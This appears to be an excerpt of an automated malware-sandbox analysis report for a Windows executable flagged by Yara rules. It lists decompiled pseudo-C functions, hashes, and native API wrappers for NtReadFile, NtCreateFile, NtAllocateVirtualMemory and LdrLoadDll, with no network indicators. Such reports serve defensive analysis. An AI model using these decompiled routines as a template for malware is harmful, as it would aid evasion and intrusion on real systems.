                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00404DDB
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00404DE0
                                                    • Part of subcall function 00405149: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0040515A
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00404DF5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
                                                  • Instruction ID: dc7575cf4b412fe6a21fcc6da34e6022567fc7f4ffee38ddce828381656d3c74
                                                  • Opcode Fuzzy Hash: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
                                                  • Instruction Fuzzy Hash: 27C002A8410A0164DD203AB325132FF1355DC92B8D78014FBAE503B6C3893D054A6D3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00407CF6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				char _v22;
                                                  				char _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _t51;
                                                  				signed int _t60;
                                                  				signed int _t61;
                                                  				short _t64;
                                                  				signed char _t66;
                                                  				signed int _t67;
                                                  				signed char* _t76;
                                                  				signed char* _t77;
                                                  				int _t80;
                                                  				signed int _t85;
                                                  				signed char* _t86;
                                                  				short* _t87;
                                                  				signed int _t88;
                                                  				signed char _t89;
                                                  				signed int _t90;
                                                  				signed int _t92;
                                                  				signed int _t93;
                                                  				short _t95;
                                                  				signed int _t96;
                                                  				intOrPtr _t99;
                                                  				signed int _t100;
                                                  
                                                  				_t51 =  *0x4150a8; // 0x90cea005
                                                  				_v8 = _t51 ^ _t100;
                                                  				_t99 = _a8;
                                                  				_t80 = E00407891(__eflags, _a4);
                                                  				if(_t80 == 0) {
                                                  					L36:
                                                  					E00407902(_t99);
                                                  					goto L37;
                                                  				} else {
                                                  					_t95 = 0;
                                                  					_t85 = 0;
                                                  					_t57 = 0;
                                                  					_v32 = 0;
                                                  					while( *((intOrPtr*)(_t57 + 0x415510)) != _t80) {
                                                  						_t85 = _t85 + 1;
                                                  						_t57 = _t57 + 0x30;
                                                  						_v32 = _t85;
                                                  						if(_t57 < 0xf0) {
                                                  							continue;
                                                  						} else {
                                                  							if(_t80 == 0xfde8 || IsValidCodePage(_t80 & 0x0000ffff) == 0) {
                                                  								L22:
                                                  							} else {
                                                  								if(_t80 != 0xfde9) {
                                                  									_t13 =  &_v28; // 0x407b49
                                                  									_t57 = GetCPInfo(_t80, _t13);
                                                  									__eflags = _t57;
                                                  									if(_t57 == 0) {
                                                  										__eflags =  *0x415f90 - _t95; // 0x0
                                                  										if(__eflags != 0) {
                                                  											goto L36;
                                                  										} else {
                                                  											goto L22;
                                                  										}
                                                  									} else {
                                                  										_t14 = _t99 + 0x18; // 0x40abac
                                                  										E00404E20(_t95, _t14, _t95, 0x101);
                                                  										 *(_t99 + 4) = _t80;
                                                  										__eflags = _v28 - 2;
                                                  										 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
                                                  										if(_v28 == 2) {
                                                  											__eflags = _v22;
                                                  											_t76 =  &_v22;
                                                  											if(_v22 != 0) {
                                                  												while(1) {
                                                  													_t89 = _t76[1];
                                                  													__eflags = _t89;
                                                  													if(_t89 == 0) {
                                                  														goto L18;
                                                  													}
                                                  													_t92 = _t89 & 0x000000ff;
                                                  													_t90 =  *_t76 & 0x000000ff;
                                                  													while(1) {
                                                  														__eflags = _t90 - _t92;
                                                  														if(_t90 > _t92) {
                                                  															break;
                                                  														}
                                                  														 *(_t99 + _t90 + 0x19) =  *(_t99 + _t90 + 0x19) | 0x00000004;
                                                  														_t90 = _t90 + 1;
                                                  														__eflags = _t90;
                                                  													}
                                                  													_t76 =  &(_t76[2]);
                                                  													__eflags =  *_t76;
                                                  													if( *_t76 != 0) {
                                                  														continue;
                                                  													}
                                                  													goto L18;
                                                  												}
                                                  											}
                                                  											L18:
                                                  											_t25 = _t99 + 0x1a; // 0x40abae
                                                  											_t77 = _t25;
                                                  											_t88 = 0xfe;
                                                  											do {
                                                  												 *_t77 =  *_t77 | 0x00000008;
                                                  												_t77 =  &(_t77[1]);
                                                  												_t88 = _t88 - 1;
                                                  												__eflags = _t88;
                                                  											} while (_t88 != 0);
                                                  											_t26 = _t99 + 4; // 0x89f38bc7
                                                  											 *((intOrPtr*)(_t99 + 0x21c)) = E00407853( *_t26);
                                                  											_t95 = 1;
                                                  										}
                                                  										goto L8;
                                                  									}
                                                  								} else {
                                                  									 *(_t99 + 4) = 0xfde9;
                                                  									 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
                                                  									 *((intOrPtr*)(_t99 + 0x18)) = _t95;
                                                  									 *((short*)(_t99 + 0x1c)) = _t95;
                                                  									L8:
                                                  									 *((intOrPtr*)(_t99 + 8)) = _t95;
                                                  									_t12 = _t99 + 0xc; // 0x40aba0
                                                  									_t96 = _t12;
                                                  									asm("stosd");
                                                  									asm("stosd");
                                                  									asm("stosd");
                                                  									L9:
                                                  									E00407967(_t80, _t92, _t96, _t99, _t99);
                                                  									L37:
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L38;
                                                  					}
                                                  					_t28 = _t99 + 0x18; // 0x40abac
                                                  					E00404E20(_t95, _t28, _t95, 0x101);
                                                  					_t60 = _v32 * 0x30;
                                                  					__eflags = _t60;
                                                  					_v36 = _t60;
                                                  					_t61 = _t60 + 0x415520;
                                                  					_v32 = _t61;
                                                  					do {
                                                  						__eflags =  *_t61;
                                                  						_t86 = _t61;
                                                  						if( *_t61 != 0) {
                                                  							while(1) {
                                                  								_t66 = _t86[1];
                                                  								__eflags = _t66;
                                                  								if(_t66 == 0) {
                                                  									break;
                                                  								}
                                                  								_t93 =  *_t86 & 0x000000ff;
                                                  								_t67 = _t66 & 0x000000ff;
                                                  								while(1) {
                                                  									__eflags = _t93 - _t67;
                                                  									if(_t93 > _t67) {
                                                  										break;
                                                  									}
                                                  									__eflags = _t93 - 0x100;
                                                  									if(_t93 < 0x100) {
                                                  										_t34 = _t95 + 0x415508; // 0x8040201
                                                  										 *(_t99 + _t93 + 0x19) =  *(_t99 + _t93 + 0x19) |  *_t34;
                                                  										_t93 = _t93 + 1;
                                                  										__eflags = _t93;
                                                  										_t67 = _t86[1] & 0x000000ff;
                                                  										continue;
                                                  									}
                                                  									break;
                                                  								}
                                                  								_t86 =  &(_t86[2]);
                                                  								__eflags =  *_t86;
                                                  								if( *_t86 != 0) {
                                                  									continue;
                                                  								}
                                                  								break;
                                                  							}
                                                  							_t61 = _v32;
                                                  						}
                                                  						_t95 = _t95 + 1;
                                                  						_t61 = _t61 + 8;
                                                  						_v32 = _t61;
                                                  						__eflags = _t95 - 4;
                                                  					} while (_t95 < 4);
                                                  					 *(_t99 + 4) = _t80;
                                                  					 *((intOrPtr*)(_t99 + 8)) = 1;
                                                  					 *((intOrPtr*)(_t99 + 0x21c)) = E00407853(_t80);
                                                  					_t46 = _t99 + 0xc; // 0x40aba0
                                                  					_t87 = _t46;
                                                  					_t92 = _v36 + 0x415514;
                                                  					_t96 = 6;
                                                  					do {
                                                  						_t64 =  *_t92;
                                                  						_t92 = _t92 + 2;
                                                  						 *_t87 = _t64;
                                                  						_t49 = _t87 + 2; // 0x498bb05d
                                                  						_t87 = _t49;
                                                  						_t96 = _t96 - 1;
                                                  						__eflags = _t96;
                                                  					} while (_t96 != 0);
                                                  					goto L9;
                                                  				}
                                                  				L38:
                                                  				return E004032D1(_v8 ^ _t100);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00407891: GetOEMCP.KERNEL32(00000000,00407B02,0040AB94,00000000,00000000,00000000,00000000,?,0040AB94), ref: 004078BC
                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00407B49,?,00000000,0040AB94,00013385,?,?,?,?,00000000), ref: 00407D54
                                                  • GetCPInfo.KERNEL32(00000000,I{@,?,?,00407B49,?,00000000,0040AB94,00013385,?,?,?,?,00000000,00000000), ref: 00407D96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CodeInfoPageValid
                                                  • String ID: I{@
                                                  • API String ID: 546120528-975015664
                                                  • Opcode ID: 297bcef892fb938130ddb1b47e7e08ec90676ea678993b08d06b01fab72ad324
                                                  • Instruction ID: 3d0df3690b6821d2caad6490c9c6180e114cff45552c7d8042500cfdabfc2bd5
                                                  • Opcode Fuzzy Hash: 297bcef892fb938130ddb1b47e7e08ec90676ea678993b08d06b01fab72ad324
                                                  • Instruction Fuzzy Hash: 9E513570D082059EDB218F65C4806BBBBE5EF90304F1480BFD086A72D1E338B942CB8A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E004032D1(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
                                                  
                                                  				asm("repne jnz 0x5");
                                                  				asm("repne ret");
                                                  				asm("repne jmp 0x2e");
                                                  				SetUnhandledExceptionFilter(0);
                                                  				UnhandledExceptionFilter(_a4);
                                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                  			}

                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00403315
                                                  • ___raise_securityfailure.LIBCMT ref: 004033FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                  • String ID: PYA
                                                  • API String ID: 3761405300-4183777465
                                                  • Opcode ID: cd6c3ecaff9722d3dbdc0566155f33ded5f4777213572c9d318174bd142b325b
                                                  • Instruction ID: c80669a3dc53a52c2e10e32b6e5b84d28a534b7ba786dcc64f87a572768d26a4
                                                  • Opcode Fuzzy Hash: cd6c3ecaff9722d3dbdc0566155f33ded5f4777213572c9d318174bd142b325b
                                                  • Instruction Fuzzy Hash: 5C2120B55A1A00DAD310CF54F9C2AD43BE4BF883A4F54923AE9098ABA0E3B44584CF4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  C-Code - Quality: 37%
                                                  			E0041827A(void* __ecx, void* __esi, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, char _a44) {
                                                  				void* _t21;
                                                  				void* _t31;
                                                  				intOrPtr* _t33;
                                                  				void* _t35;
                                                  
                                                  				 *((intOrPtr*)(__esi + 0x556bf3e3)) =  *((intOrPtr*)(__esi + 0x556bf3e3)) + __ecx;
                                                  				_t16 = _a8;
                                                  				_t33 = _a8 + 0xc48;
                                                  				E00418DD0(_t31, _a8, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                  				_t6 =  &_a44; // 0x413a21
                                                  				_t8 =  &_a36; // 0x413d62
                                                  				_t14 =  &_a12; // 0x413d62
                                                  				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a16, _a20, _a24, _a28, _a32,  *_t8, _a40,  *_t6, __esi, _t35); // executed
                                                  				return _t21;
                                                  			}

                                                  APIs
                                                  • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: !:A$b=A$b=A
                                                  • API String ID: 2738559852-704622139
                                                  • Opcode ID: 1aab453634066371c4b3d1dea44d37b712b2ad37d0e15794effdeea4387f06b4
                                                  • Instruction ID: 92c5afc51425679be73b9dc0d4a763036db000f3efbd101af76b7c70eac3e128
                                                  • Opcode Fuzzy Hash: 1aab453634066371c4b3d1dea44d37b712b2ad37d0e15794effdeea4387f06b4
                                                  • Instruction Fuzzy Hash: D9F0F4B2200208AFCB14DF89DC90EEB77A9AF8C354F15864DFA4D97281C674EC51CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                  				void* _t18;
                                                  				void* _t27;
                                                  				intOrPtr* _t28;
                                                  
                                                  				_t13 = _a4;
                                                  				_t28 = _a4 + 0xc48;
                                                  				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                  				_t4 =  &_a40; // 0x413a21
                                                  				_t6 =  &_a32; // 0x413d62
                                                  				_t12 =  &_a8; // 0x413d62
                                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                  				return _t18;
                                                  			}

                                                  APIs
                                                  • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: !:A$b=A$b=A
                                                  • API String ID: 2738559852-704622139
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: 9zA
                                                  • API String ID: 2167126740-15787895
                                                  • Opcode ID: 7fb3e7dd18673eb57b719e30b6d31cb29169138a7b2246e5f59d201f6be17d6b
                                                  • Instruction ID: 30d9030b02a5008919fd8638acaba1f0516d36b3857edc39f57dc779ede0c8d7
                                                  • Opcode Fuzzy Hash: 7fb3e7dd18673eb57b719e30b6d31cb29169138a7b2246e5f59d201f6be17d6b
                                                  • Instruction Fuzzy Hash: A601E5B6200209ABCB14DF99DC85DEB77ADAF88654F118609B91897241DA34E8118BB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: d30e2700bc47593ff8244f4b4072785e8a66b3f6641ca7e6b792b6e8aa849593
                                                  • Instruction ID: c132f922142c0caead4070f9def5d6cfe262326e89a3fae77dd32065351696ae
                                                  • Opcode Fuzzy Hash: d30e2700bc47593ff8244f4b4072785e8a66b3f6641ca7e6b792b6e8aa849593
                                                  • Instruction Fuzzy Hash: 0A1190B2604208ABCB08DF98DC85DEB73ADAF8C754F158649BA1997241DA34EC51CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                  • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                  • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: b186501b418576f0686bfbd6ff745954568dd86e3dcefedec52d8ce59d259eea
                                                  • Instruction ID: 8fb2f5b842f47f65a0e2c1dd2c0dbbba10fceaf7396ab2031682cc05f905931f
                                                  • Opcode Fuzzy Hash: b186501b418576f0686bfbd6ff745954568dd86e3dcefedec52d8ce59d259eea
                                                  • Instruction Fuzzy Hash: 74019DB2204108AFCB58CF99D886EEB77A9AF9C354F15824CBA1D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 5f512cadd4532a9ab5bb65f77e20dc18638f67bd94716a75d06d91c18fe6facb
                                                  • Instruction ID: 3db5705d8eab3e7b071754d6058680f240d6593ad4d201c3873ffa7bef1ab16b
                                                  • Opcode Fuzzy Hash: 5f512cadd4532a9ab5bb65f77e20dc18638f67bd94716a75d06d91c18fe6facb
                                                  • Instruction Fuzzy Hash: DEE086756402047BD710DBA4CC45ED77B58DF443A0F15469DB9499B282D574E500CBD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e71484a11dfe017974fc69e144a0d0c6d11f4940a61fad92790e489654fef0d1
                                                  • Instruction ID: d12984d1f178512cbba70771ba77223481fbc6bab865cefcb134404df0f1f837
                                                  • Opcode Fuzzy Hash: e71484a11dfe017974fc69e144a0d0c6d11f4940a61fad92790e489654fef0d1
                                                  • Instruction Fuzzy Hash: 549002A162100602D60171596404616010A97D0382FA1D032A1024555ECA6589A2F171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0817085d781d2e05ad367075ed978a984a16577f6ddd2b86cd3528cee871a78b
                                                  • Instruction ID: 335214df4d5b41456217b03f8535f74051f87f063c6e0bcd80a3a0db2f5478ee
                                                  • Opcode Fuzzy Hash: 0817085d781d2e05ad367075ed978a984a16577f6ddd2b86cd3528cee871a78b
                                                  • Instruction Fuzzy Hash: 0F9002A1262042525A45B15964045074106A7E0382BA1D022A1414950C85669866E661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7001ba38825500b9d33a44d3e4e3cd78640de42d83b3797de7059699bf384c15
                                                  • Instruction ID: 9a3c58faf831501713a7faac86d6f7203fe7570b4759844caf6d2bb869c5526b
                                                  • Opcode Fuzzy Hash: 7001ba38825500b9d33a44d3e4e3cd78640de42d83b3797de7059699bf384c15
                                                  • Instruction Fuzzy Hash: 2F9002B122100513D61161596504707010997D0382FA1D422A0424558D96968962F161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b831c5b35d8ef2bb439e0de0724ca3431d5fd57bfbabbbf130ded90d525e2917
                                                  • Instruction ID: d63502936edb218a4910c52bed4b2ce5ee4ac5441caaf1539836562c0d2840eb
                                                  • Opcode Fuzzy Hash: b831c5b35d8ef2bb439e0de0724ca3431d5fd57bfbabbbf130ded90d525e2917
                                                  • Instruction Fuzzy Hash: 089002E122200103460571596414616410A97E0342F61D031E1014590DC56588A1B165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6f5f82946adf09f22b69090f25e8795fcf5c11cd4b42d0197f6224135522f505
                                                  • Instruction ID: e4f029cec82d6a86c65a8120fe88f39695796ba7c84026680bd3696dca816ed5
                                                  • Opcode Fuzzy Hash: 6f5f82946adf09f22b69090f25e8795fcf5c11cd4b42d0197f6224135522f505
                                                  • Instruction Fuzzy Hash: D69002E136100542D60061596414B060105D7E1342F61D025E1064554D8659CC62B166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f4cc4ea42f04127c70e04a5ada7a5076231243e9972f10cbc26aa647a0ad6b94
                                                  • Instruction ID: 1873bbc5dcde0ee127bee4422d8bcf8025d61d33931aac1c51d680620f50be9b
                                                  • Opcode Fuzzy Hash: f4cc4ea42f04127c70e04a5ada7a5076231243e9972f10cbc26aa647a0ad6b94
                                                  • Instruction Fuzzy Hash: AB9002A5231001030605A5592704507014697D5392761D031F1015550CD6618871A161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9c533a14d57357a33fbe53b705d508a269f1b8ea95e4c19ae081b33ba3abff7d
                                                  • Instruction ID: 23b99a5d76061c61115c10ff5841c7415cc9d17ae5d7e6029e117488f08cb040
                                                  • Opcode Fuzzy Hash: 9c533a14d57357a33fbe53b705d508a269f1b8ea95e4c19ae081b33ba3abff7d
                                                  • Instruction Fuzzy Hash: BA9002F122100502D64071596404746010597D0342F61D021A5064554E86998DE5B6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d79c2ae86764de82117a4ef9a569a22fe7aa38f112d47a0f13ac5e2438cd8c21
                                                  • Instruction ID: 06d6e714a2f0dbb4eb5a8526b0483c5562b3a55c6497e6c389d6d846a350f0d0
                                                  • Opcode Fuzzy Hash: d79c2ae86764de82117a4ef9a569a22fe7aa38f112d47a0f13ac5e2438cd8c21
                                                  • Instruction Fuzzy Hash: C29002B122108902D6106159A40474A010597D0342F65D421A4424658D86D588A1B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
